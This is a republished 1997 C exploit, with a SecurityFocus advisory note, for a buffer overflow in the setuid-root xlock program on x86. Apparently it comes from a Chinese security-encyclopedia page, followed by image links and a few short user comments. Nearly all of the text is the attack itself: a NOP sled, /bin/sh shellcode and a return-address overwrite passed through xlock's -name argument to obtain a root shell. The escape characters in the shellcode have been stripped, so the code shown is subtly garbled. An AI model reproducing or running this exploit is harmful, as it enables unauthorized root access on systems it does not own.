/*
source: http://www.securityfocus.com/bid/224/info
The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access.
*/
/* x86 XLOCK overflow exploit
by [email protected] 4/17/97
Original exploit framework - lpr exploit
Usage: make xlock-exploit
xlock-exploit <optional_offset>
Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996
long get_esp(void)
{
__asm__("movl %esp,%eaxn");
}
int main(int argc, char *argv[])
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int dfltOFFSET = DEFAULT_OFFSET;
u_char execshell[] = "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07"
"x89x56x0fxb8x1bx56x34x12x35x10x56x34x12"
"x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80xe8"
"xd7xffxffxff/bin/sh";
int i;
if (argc > 1)
dfltOFFSET = atoi(argv[1]);
else printf("You can specify another offset as a parameter if you
need...n");
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memoryn");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + dfltOFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
![图片[1]-SGI IRIX xlock缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-SGI IRIX xlock缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
![[红日安全]Web安全Day5 - 任意文件上传实战攻防 - 作者:Setup-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/xzfile.aliyuncs.com/media/upload/picture/20190919091742-47925c06-da7b-1.png)
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666